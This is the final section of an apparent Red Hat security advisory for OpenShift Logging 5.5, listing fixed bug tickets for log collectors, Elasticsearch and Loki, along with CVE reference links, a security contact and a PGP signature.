LOG-2463 - Elasticsearch operator repeatedly prints error message when checking indices  
LOG-2474 - EO shouldn't grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.5]  
LOG-2522 - CLO supported time units don't match the units specified in CRDs.  
LOG-2525 - The container's logs are not sent to separate index if the annotation is added after the pod is ready.  
LOG-2546 - TLS handshake error on loki-gateway for FIPS cluster  
LOG-2549 - [Vector] [master] Journald logs not sent to the Log store when using Vector as collector.  
LOG-2554 - [Vector] [master] Fallback index is not used when structuredTypeKey is missing from JSON log data  
LOG-2588 - FluentdQueueLengthIncreasing rule failing to be evaluated.  
LOG-2596 - [vector]the condition in [transforms.route_container_logs] is inaccurate  
LOG-2599 - Supported values for level field don't match documentation  
LOG-2605 - $labels.instance is empty in the message when firing FluentdNodeDown alert  
LOG-2609 - fluentd and vector are unable to ship logs to elasticsearch when cluster-wide proxy is in effect  
LOG-2619 - containers violate PodSecurity -- Log Exporation  
LOG-2627 - containers violate PodSecurity -- Loki  
LOG-2649 - Level Critical should match the beginning of the line as the other levels  
LOG-2656 - Logging uses deprecated v1beta1 apis  
LOG-2664 - Deprecated Feature logs causing too much noise  
LOG-2665 - [Logging 5.5] Sometimes collector fails to push logs to Elasticsearch cluster  
LOG-2693 - Integration with Jaeger fails for ServiceMonitor  
LOG-2700 - [Vector] vector container can't start due to "unknown field `pod_annotation_fields`" .  
LOG-2703 - Collector DaemonSet is not removed when CLF is deleted for fluentd/vector only CL instance  
LOG-2725 - Upgrade logging-eventrouter Golang  version and tags  
LOG-2731 - CLO keeps reporting `Reconcile ServiceMonitor retry error` and `Reconcile Service retry error` after creating clusterlogging.  
LOG-2732 - Prometheus Operator pod throws 'skipping servicemonitor' error on Jaeger integration  
LOG-2742 - unrecognized outputs when use the sts role secret  
LOG-2746 - CloudWatch forwarding rejecting large log events, fills tmpfs  
LOG-2749 - OpenShift Logging Dashboard for Elastic Shards shows "active_primary" instead of "active" shards.  
LOG-2753 - Update Grafana configuration for LokiStack integration on grafana/loki repo  
LOG-2763 - [Vector]{Master} Vector's healthcheck fails when forwarding logs to Lokistack.  
LOG-2764 - ElasticSearch operator does not respect referencePolicy when selecting oauth-proxy image  
LOG-2765 - ingester pod can not be started in IPv6 cluster  
LOG-2766 - [vector] failed to parse cluster url: invalid authority IPv6 http-proxy  
LOG-2772 - arn validation failed when role_arn=arn:aws-us-gov:xxx  
LOG-2773 - No cluster-logging-operator-metrics  service in logging 5.5  
LOG-2778 - [Vector] [OCP 4.11] SA token not added to Vector config when connecting to LokiStack instance without CLF creds secret required by LokiStack.  
LOG-2784 - Japanese log messages are garbled at Kibana  
LOG-2793 - [Vector] OVN audit logs are missing the level field.  
LOG-2864 - [vector] Can not sent logs to default when loki is the default output in CLF  
LOG-2867 - [fluentd] All logs are sent to application tenant when loki is used as default logstore in CLF.  
LOG-2873 - [Vector] Cannot configure CPU/Memory requests/limits when using Vector as collector.  
LOG-2875 - Seeing a black rectangle box on the graph in Logs view  
LOG-2876 - The link to the 'Container details' page on the 'Logs' screen throws error  
LOG-2877 - When there is no query entered, seeing error message on the Logs view  
LOG-2882 - RefreshIntervalDropdown and TimeRangeDropdown always set back to its original values when switching between pages in 'Logs' screen

6. References:

https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2022-0759  
https://access.redhat.com/security/cve/CVE-2022-1012  
https://access.redhat.com/security/cve/CVE-2022-1292  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-1785  
https://access.redhat.com/security/cve/CVE-2022-1897  
https://access.redhat.com/security/cve/CVE-2022-1927  
https://access.redhat.com/security/cve/CVE-2022-2068  
https://access.redhat.com/security/cve/CVE-2022-2097  
https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-32250  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYv5/w9zjgjWX9erEAQhRBBAAiZe24VtCQruCG/MvGEOowBvHf/YNANlR  
N6WAw2VezEfvFkG7z599MWZVWz2jnZO6cn9i+CoNDanAmItPJ8ljK4sitrP2ywrG  
OKwqIa4DPrywFFTSMxemB604ewE0cvXifuqG5bQDn+GvndiV/u/XaVTYZseY1P5X  
8ZIJ20cxROOE9pg0/3eya27edZxDrgWx6BtzSEZw47ReV3Dogqy+KzRCAAoN+pE5  
g2t/E0u0Ypmjil9Ttsop/ejUg/iz8UTGtua4m1nzhZrsoE84p5xIgvCEkYlh3OrD  
tfawpj1r9Avcjk4zbZkAe/enSQZQv0iWD792SoP7/ddX5tIu05ArvPWj/NvN/rI4  
dFzMe2UmezuS2EQpzaWOug2xSQUbR1hI+Y4cy0YOHuwzeaMeoHSbNYTJmOxKR0v1  
44a9oSBku+Xfk8nUNqS+9oq0z3DlAWt2BjbfrJCbSjZQdOUOIGM95L3ClrXY9LYF  
PT5v+h2W4myonj6HVhkv+Wy7aRbYQ7Qhk/3AaN7Dz5soBSNK4exvOzWXGuf/BdSf  
XFef6O87ipZveHQYmTfH+t8aJV1plEVTrm8pyz2EfzCv1Fnhjn0rvbGZAFBlvqW+  
vhxoj505RQBBhcno16V1zczdd8KsiqY7aZniTuh2DQAVvNhqsHgn8rvQ7HJlExun  
eIFVKOxx310=ynB/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#js